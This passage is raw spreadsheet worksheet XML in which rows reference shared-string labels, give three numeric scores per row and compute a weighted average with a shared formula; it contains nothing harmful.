        <v>5</v>
      </c>
      <c r="D10" s="14">
        <v>5</v>
      </c>
      <c r="E10" s="14">
        <v>5</v>
      </c>
      <c r="F10" s="32">
        <f t="shared" si="0"/>
        <v>5</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A11" s="13" t="s">
        <v>1139</v>
      </c>
      <c r="B11" s="13" t="s">
        <v>2918</v>
      </c>
      <c r="C11" s="14">
        <v>3</v>
      </c>
      <c r="D11" s="14">
        <v>1</v>
      </c>
      <c r="E11" s="14">
        <v>1</v>
      </c>
      <c r="F11" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A12" s="13" t="s">
        <v>2919</v>
      </c>
      <c r="B12" s="13"/>
      <c r="C12" s="14">
        <v>0</v>
      </c>
      <c r="D12" s="14">
        <v>0</v>
      </c>
      <c r="E12" s="14">
        <v>0</v>
      </c>
      <c r="F12" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A13" s="13" t="s">
        <v>2920</v>
      </c>
      <c r="B13" s="13"/>
      <c r="C13" s="14">
        <v>0</v>
      </c>
      <c r="D13" s="14">
        <v>0</v>
      </c>
      <c r="E13" s="14">
        <v>0</v>
      </c>
      <c r="F13" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A14" s="13" t="s">
        <v>2921</v>
      </c>
      <c r="B14" s="13"/>
      <c r="C14" s="14">
        <v>0</v>
      </c>
      <c r="D14" s="14">
        <v>0</v>
      </c>
      <c r="E14" s="14">
        <v>0</v>
      </c>
      <c r="F14" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A15" s="13" t="s">
        <v>2922</v>
      </c>
      <c r="B15" s="13"/>
      <c r="C15" s="14">
        <v>0</v>
      </c>
      <c r="D15" s="14">
        <v>0</v>
      </c>
      <c r="E15" s="14">
        <v>0</v>
      </c>
      <c r="F15" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A16" s="13" t="s">
        <v>713</v>
      </c>
      <c r="B16" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C16" s="14">
        <v>0</v>
      </c>
      <c r="D16" s="14">
        <v>0</v>
      </c>
      <c r="E16" s="14">
        <v>0</v>
      </c>
      <c r="F16" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17" s="13" t="s">
        <v>2923</v>
      </c>
      <c r="B17" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C17" s="14">
        <v>0</v>
      </c>
      <c r="D17" s="14">
        <v>0</v>
      </c>
      <c r="E17" s="14">
        <v>0</v>
      </c>
      <c r="F17" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18" s="13" t="s">
        <v>1474</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C18" s="14">
        <v>0</v>
      </c>
      <c r="D18" s="14">
        <v>0</v>
      </c>
      <c r="E18" s="14">
        <v>0</v>
      </c>
      <c r="F18" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19" s="13" t="s">
        <v>2924</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C19" s="14">
        <v>0</v>
      </c>
      <c r="D19" s="14">
        <v>0</v>
      </c>
      <c r="E19" s="14">
        <v>0</v>
      </c>
      <c r="F19" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20" s="13" t="s">
        <v>2925</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>2926</v>
      </c>
      <c r="C20" s="14">
        <v>2.5</v>
      </c>
      <c r="D20" s="14">
        <v>1</v>
      </c>
      <c r="E20" s="14">
        <v>1</v>
      </c>
      <c r="F20" s="32">
        <f t="shared" si="0"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21" s="13" t="s">
        <v>2927</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>2928</v>
      </c>
      <c r="C21" s="14">
        <v>0</v>
      </c>
      <c r="D21" s="14">
        <v>0</v>
      </c>
      <c r="E21" s="14">
        <v>0</v>
      </c>
      <c r="F21" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22" s="13" t="s">
        <v>2927</v>
      </c>
      <c r="B22" s="13" t="s">
        <v>2929</v>
      </c>
      <c r="C22" s="14">
        <v>0</v>
      </c>
      <c r="D22" s="14">
        <v>0</v>
      </c>
      <c r="E22" s="14">
        <v>0</v>
      </c>
      <c r="F22" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23" s="13" t="s">
        <v>2930</v>
      </c>
      <c r="B23" s="13" t="s">
        <v>2931</v>
      </c>
      <c r="C23" s="14">
        <v>0</v>
      </c>
      <c r="D23" s="14">
        <v>0</v>
      </c>
      <c r="E23" s="14">
        <v>0</v>
      </c>
      <c r="F23" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24" s="13" t="s">
        <v>2932</v>
      </c>
      <c r="B24" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C24" s="14">
        <v>0</v>
      </c>
      <c r="D24" s="14">
        <v>0</v>
      </c>
      <c r="E24" s="14">
        <v>0</v>
      </c>
      <c r="F24" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25" s="13" t="s">
        <v>2933</v>
      </c>
      <c r="B25" s="13" t="s">
        <v>2934</v>
      </c>
      <c r="C25" s="14">
        <v>3</v>
      </c>
      <c r="D25" s="14">
        <v>4</v>
      </c>
      <c r="E25" s="14">
        <v>5</v>
      </c>
      <c r="F25" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B26" s="13" t="s">
        <v>2936</v>
      </c>
      <c r="C26" s="14">
        <v>4</v>
      </c>
      <c r="D26" s="14">
        <v>5</v>
      </c>
      <c r="E26" s="14">
        <v>5</v>
      </c>
      <c r="F26" s="32">
        <f t="shared" si="0"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B27" s="13" t="s">
        <v>2937</v>
      </c>
      <c r="C27" s="14">
        <v>0</v>
      </c>
      <c r="D27" s="14">
        <v>0</v>
      </c>
      <c r="E27" s="14">
        <v>0</v>
      </c>
      <c r="F27" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28" s="13" t="s">
        <v>2935</v>
      </c>
      <c r="B28" s="13" t="s">
        <v>2938</v>
      </c>
      <c r="C28" s="14">
        <v>5</v>
      </c>
      <c r="D28" s="14">
        <v>4</v>
      </c>
      <c r="E28" s="14">
        <v>5</v>
      </c>
      <c r="F28" s="32">
        <f t="shared" si="0"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29" s="13" t="s">
        <v>2939</v>
      </c>
      <c r="B29" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C29" s="14">
        <v>0</v>
      </c>
      <c r="D29" s="14">
        <v>0</v>
      </c>
      <c r="E29" s="14">
        <v>0</v>
      </c>
      <c r="F29" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30" s="13" t="s">
        <v>2940</v>
      </c>
      <c r="B30" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C30" s="14">
        <v>0</v>
      </c>
      <c r="D30" s="14">
        <v>0</v>
      </c>
      <c r="E30" s="14">
        <v>0</v>
      </c>
      <c r="F30" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31" s="13" t="s">
        <v>2941</v>
      </c>
      <c r="B31" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C31" s="14">
        <v>0</v>
      </c>
      <c r="D31" s="14">
        <v>0</v>
      </c>
      <c r="E31" s="14">
        <v>0</v>
      </c>
      <c r="F31" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B32" s="13" t="s">
        <v>2942</v>
      </c>
      <c r="C32" s="14">
        <v>0</v>
      </c>
      <c r="D32" s="14">
        <v>0</v>
      </c>
      <c r="E32" s="14">
        <v>0</v>
      </c>
      <c r="F32" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B33" s="13" t="s">
        <v>2943</v>
      </c>
      <c r="C33" s="14">
        <v>2</v>
      </c>
      <c r="D33" s="14">
        <v>4</v>
      </c>
      <c r="E33" s="14">
        <v>5</v>
      </c>
      <c r="F33" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B34" s="13" t="s">
        <v>2944</v>
      </c>
      <c r="C34" s="14">
        <v>2</v>
      </c>
      <c r="D34" s="14">
        <v>4</v>
      </c>
      <c r="E34" s="14">
        <v>5</v>
      </c>
      <c r="F34" s="32">
        <f t="shared" ref="F34:F65" si="1">((C34*2)+D34+(E34*2))/5</f>
        <v>3.6</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B35" s="13" t="s">
        <v>2945</v>
      </c>
      <c r="C35" s="14">
        <v>2</v>
      </c>
      <c r="D35" s="14">
        <v>4</v>
      </c>
      <c r="E35" s="14">
        <v>5</v>
      </c>
      <c r="F35" s="32">
        <f t="shared" si="1"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B36" s="13" t="s">
        <v>2946</v>
      </c>
      <c r="C36" s="14">
        <v>0</v>
      </c>
      <c r="D36" s="14">
        <v>0</v>
      </c>
      <c r="E36" s="14">
        <v>0</v>
      </c>
      <c r="F36" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B37" s="13" t="s">
        <v>2947</v>
      </c>
      <c r="C37" s="14">
        <v>0</v>
      </c>
      <c r="D37" s="14">
        <v>0</v>
      </c>
      <c r="E37" s="14">
        <v>0</v>
      </c>
      <c r="F37" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B38" s="13" t="s">
        <v>2948</v>
      </c>
      <c r="C38" s="14">
        <v>0</v>
      </c>
      <c r="D38" s="14">
        <v>0</v>
      </c>
      <c r="E38" s="14">
        <v>0</v>
      </c>
      <c r="F38" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39" s="13" t="s">
        <v>2949</v>
      </c>
      <c r="B39" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C39" s="14">
        <v>0</v>
      </c>
      <c r="D39" s="14">
        <v>0</v>
      </c>
      <c r="E39" s="14">
        <v>0</v>
      </c>
      <c r="F39" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40" s="13" t="s">
        <v>2950</v>
      </c>
      <c r="B40" s="13" t="s">
        <v>2951</v>
      </c>
      <c r="C40" s="14">
        <v>3</v>
      </c>
      <c r="D40" s="14">
        <v>5</v>
      </c>
      <c r="E40" s="14">
        <v>5</v>
      </c>
      <c r="F40" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41" s="13" t="s">
        <v>2950</v>
      </c>
      <c r="B41" s="13" t="s">
        <v>2952</v>
      </c>
      <c r="C41" s="14">
        <v>0</v>
      </c>
      <c r="D41" s="14">
        <v>0</v>
      </c>
      <c r="E41" s="14">
        <v>0</v>
      </c>
      <c r="F41" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42" s="13" t="s">
        <v>2953</v>
      </c>
      <c r="B42" s="13" t="s">
        <v>2934</v>
      </c>
      <c r="C42" s="14">
        <v>3</v>
      </c>
      <c r="D42" s="14">
        <v>5</v>
      </c>
      <c r="E42" s="14">
        <v>5</v>
      </c>
      <c r="F42" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43" s="13" t="s">
        <v>2954</v>
      </c>
      <c r="B43" s="13"/>
      <c r="C43" s="14">
        <v>0</v>
      </c>
      <c r="D43" s="14">
        <v>0</v>
      </c>
      <c r="E43" s="14">
        <v>0</v>
      </c>
      <c r="F43" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44" s="13" t="s">
        <v>2955</v>
      </c>
      <c r="B44" s="13" t="s">
        <v>2928</v>
      </c>
      <c r="C44" s="14">
        <v>0</v>
      </c>
      <c r="D44" s="14">
        <v>0</v>
      </c>
      <c r="E44" s="14">
        <v>0</v>
      </c>
      <c r="F44" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45" s="45" t="s">
        <v>2955</v>
      </c>
      <c r="B45" s="45" t="s">
        <v>2956</v>
      </c>
      <c r="C45" s="14">
        <v>3</v>
      </c>
      <c r="D45" s="14">
        <v>3</v>
      </c>
      <c r="E45" s="14">
        <v>5</v>
      </c>
      <c r="F45" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46" s="13" t="s">
        <v>2957</v>
      </c>
      <c r="B46" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C46" s="14">
        <v>0</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>0</v>
      </c>
      <c r="F46" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47" s="13" t="s">
        <v>2958</v>
      </c>
      <c r="B47" s="13" t="s">
        <v>2959</v>
      </c>
      <c r="C47" s="14">
        <v>5</v>
      </c>
      <c r="D47" s="14">
        <v>5</v>
      </c>
      <c r="E47" s="14">
        <v>5</v>
      </c>
      <c r="F47" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48" s="13" t="s">
        <v>2958</v>
      </c>
      <c r="B48" s="13" t="s">
        <v>2960</v>
      </c>
      <c r="C48" s="14">
        <v>0</v>
      </c>
      <c r="D48" s="14">
        <v>0</v>
      </c>
      <c r="E48" s="14">
        <v>0</v>
      </c>
      <c r="F48" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A49" s="13" t="s">
        <v>2961</v>
      </c>
      <c r="B49" s="13" t="s">
        <v>2910</v>
      </c>
      <c r="C49" s="14">
        <v>0</v>
      </c>
      <c r="D49" s="14">
        <v>0</v>
      </c>
      <c r="E49" s="14">
        <v>0</v>
      </c>
      <c r="F49" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A50" s="13" t="s">
        <v>2962</v>
      </c>
      <c r="B50" s="13" t="s">
        <v>2963</v>
      </c>
      <c r="C50" s="14">
        <v>0</v>
      </c>
      <c r="D50" s="14">
        <v>0</v>
      </c>
      <c r="E50" s="14">
        <v>0</v>
      </c>
      <c r="F50" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A51" s="13" t="s">
        <v>2964</v>
      </c>
      <c r="B51" s="13"/>
      <c r="C51" s="14">
        <v>0</v>
      </c>
      <c r="D51" s="14">
        <v>0</v>
      </c>
      <c r="E51" s="14">
        <v>0</v>
      </c>
      <c r="F51" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A52" s="13" t="s">
        <v>2965</v>
      </c>
      <c r="B52" s="13" t="s">
        <v>2966</v>
      </c>
      <c r="C52" s="14">
        <v>5</v>
      </c>
      <c r="D52" s="14">
        <v>5</v>
      </c>
      <c r="E52" s="14">
        <v>5</v>
      </c>
      <c r="F52" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A53" s="13" t="s">
        <v>2965</v>
      </c>
      <c r="B53" s="13" t="s">
        <v>2967</v>
      </c>
      <c r="C53" s="14">
        <v>4</v>
      </c>
      <c r="D53" s="14">
        <v>4</v>
      </c>
      <c r="E53" s="14">
        <v>5</v>
      </c>
      <c r="F53" s="32">
        <f t="shared" si="1"/>
        <v>4.4000000000000004</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A54" s="13" t="s">
        <v>2968</v>
      </c>
      <c r="B54" s="13"/>
      <c r="C54" s="14">
        <v>0</v>
      </c>
      <c r="D54" s="14">
        <v>0</v>
      </c>
      <c r="E54" s="14">
        <v>0</v>
      </c>
      <c r="F54" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A55" s="13" t="s">
        <v>2969</v>
      </c>
      <c r="B55" s="13"/>
      <c r="C55" s="14">
        <v>0</v>
      </c>
      <c r="D55" s="14">
        <v>0</v>
      </c>
      <c r="E55" s="14">
        <v>0</v>
      </c>
      <c r="F55" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A56" s="13" t="s">
        <v>1228</v>
      </c>
      <c r="B56" s="13"/>
      <c r="C56" s="14">
        <v>0</v>
      </c>
      <c r="D56" s="14">
        <v>0</v>
      </c>
      <c r="E56" s="14">
        <v>0</v>
      </c>
      <c r="F56" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A57" s="13" t="s">
        <v>2970</v>
      </c>
      <c r="B57" s="13"/>
      <c r="C57" s="14">
        <v>0</v>
      </c>
      <c r="D57" s="14">
        <v>0</v>
      </c>
      <c r="E57" s="14">
        <v>0</v>
      </c>
      <c r="F57" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A58" s="13" t="s">
        <v>2971</v>
      </c>
      <c r="B58" s="13" t="s">
        <v>2972</v>
      </c>
      <c r="C58" s="14">
        <v>0</v>
      </c>
      <c r="D58" s="14">
        <v>0</v>
      </c>
      <c r="E58" s="14">
        <v>0</v>
      </c>
      <c r="F58" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A59" s="13" t="s">
        <v>2973</v>
      </c>
      <c r="B59" s="13" t="s">
        <v>2974</v>
      </c>
      <c r="C59" s="14">
        <v>0</v>
      </c>
      <c r="D59" s="14">
        <v>0</v>
      </c>
      <c r="E59" s="14">
        <v>0</v>
      </c>
      <c r="F59" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A60" s="13" t="s">
        <v>2973</v>
      </c>
      <c r="B60" s="13" t="s">
        <v>2975</v>
      </c>
      <c r="C60" s="14">
        <v>0</v>
      </c>
      <c r="D60" s="14">
        <v>0</v>
      </c>
      <c r="E60" s="14">
        <v>0</v>
      </c>
      <c r="F60" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A61" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B61" s="13" t="s">
        <v>2977</v>
      </c>
      <c r="C61" s="14">
        <v>1</v>
      </c>
      <c r="D61" s="14">
        <v>1</v>
      </c>
      <c r="E61" s="14">
        <v>1</v>
      </c>
      <c r="F61" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A62" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B62" s="13" t="s">
        <v>2978</v>
      </c>
      <c r="C62" s="14">
        <v>5</v>
      </c>
      <c r="D62" s="14">
        <v>5</v>
      </c>
      <c r="E62" s="14">
        <v>5</v>
      </c>
      <c r="F62" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A63" s="13" t="s">
        <v>2976</v>
      </c>
      <c r="B63" s="13" t="s">
        <v>2977</v>
      </c>
      <c r="C63" s="14">
        <v>1</v>
      </c>
      <c r="D63" s="14">
        <v>1</v>
      </c>
      <c r="E63" s="14">
        <v>1</v>
      </c>
      <c r="F63" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A64" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B64" s="13" t="s">
        <v>2977</v>
      </c>
      <c r="C64" s="14">
        <v>1</v>
      </c>
      <c r="D64" s="14">
        <v>1</v>
      </c>
      <c r="E64" s="14">
        <v>1</v>
      </c>
      <c r="F64" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B65" s="13" t="s">
        <v>2979</v>
      </c>
      <c r="C65" s="14">
        <v>5</v>
      </c>
      <c r="D65" s="14">
        <v>5</v>
      </c>
      <c r="E65" s="14">
        <v>5</v>
      </c>
      <c r="F65" s="32">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B66" s="13" t="s">
        <v>2978</v>
      </c>
      <c r="C66" s="14">
        <v>5</v>
      </c>
      <c r="D66" s="14">
        <v>5</v>
      </c>
      <c r="E66" s="14">
        <v>5</v>
      </c>
      <c r="F66" s="32">
        <f t="shared" ref="F66:F97" si="2">((C66*2)+D66+(E66*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B67" s="13" t="s">
        <v>2980</v>
      </c>
      <c r="C67" s="14">
        <v>5</v>
      </c>
      <c r="D67" s="14">
        <v>5</v>
      </c>
      <c r="E67" s="14">
        <v>5</v>
      </c>
      <c r="F67" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B68" s="13" t="s">
        <v>2981</v>
      </c>
      <c r="C68" s="14">
        <v>5</v>
      </c>
      <c r="D68" s="14">
        <v>5</v>
      </c>
      <c r="E68" s="14">
        <v>5</v>
      </c>
      <c r="F68" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B69" s="13" t="s">
        <v>2982</v>
      </c>
      <c r="C69" s="14">
        <v>5</v>
      </c>
      <c r="D69" s="14">
        <v>5</v>
      </c>
      <c r="E69" s="14">
        <v>5</v>
      </c>
      <c r="F69" s="32">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B70" s="13" t="s">
        <v>2983</v>
      </c>
      <c r="C70" s="14">
        <v>0</v>
      </c>
      <c r="D70" s="14">
        <v>0</v>
      </c>
      <c r="E70" s="14">
        <v>0</v>
      </c>
      <c r="F70" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71" s="13" t="s">
        <v>589</v>
      </c>
      <c r="B71" s="13" t="s">
        <v>2984</v>
      </c>
      <c r="C71" s="14">
        <v>0</v>
      </c>
      <c r="D71" s="14">
        <v>0</v>
      </c>
      <c r="E71" s="14">
        <v>0</v>
      </c>
      <c r="F71" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B72" s="13" t="s">
        <v>2986</v>
      </c>
      <c r="C72" s="14">
        <v>1</v>
      </c>
      <c r="D72" s="14">
        <v>5</v>
      </c>
      <c r="E72" s="14">
        <v>1</v>
      </c>
      <c r="F72" s="32">
        <f t="shared" si="2"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B73" s="13" t="s">
        <v>2987</v>
      </c>
      <c r="C73" s="14">
        <v>5</v>
      </c>
      <c r="D73" s="14">
        <v>4</v>
      </c>
      <c r="E73" s="14">
        <v>5</v>
      </c>
      <c r="F73" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B74" s="13" t="s">
        <v>2959</v>
      </c>
      <c r="C74" s="14">
        <v>5</v>
      </c>
      <c r="D74" s="14">
        <v>4</v>
      </c>
      <c r="E74" s="14">
        <v>5</v>
      </c>
      <c r="F74" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A75" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B75" s="13" t="s">
        <v>2960</v>
      </c>
      <c r="C75" s="14">
        <v>5</v>
      </c>
      <c r="D75" s="14">
        <v>4</v>
      </c>
      <c r="E75" s="14">
        <v>5</v>
      </c>
      <c r="F75" s="32">
        <f t="shared" si="2"/>
        <v>4.8</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A76" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B76" s="13" t="s">
        <v>2988</v>
      </c>
      <c r="C76" s="14">
        <v>0</v>
      </c>
      <c r="D76" s="14">
        <v>0</v>
      </c>
      <c r="E76" s="14">
        <v>0</v>
      </c>
      <c r="F76" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A77" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B77" s="13" t="s">
        <v>2989</v>
      </c>
      <c r="C77" s="14">
        <v>0</v>
      </c>
      <c r="D77" s="14">
        <v>0</v>
      </c>
      <c r="E77" s="14">
        <v>0</v>
      </c>
      <c r="F77" s="32">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A78" s="13" t="s">
        <v>2985</v>
      </c>
      <c r="B78" s="13" t="s">
        <v>2990</v>
      </c>
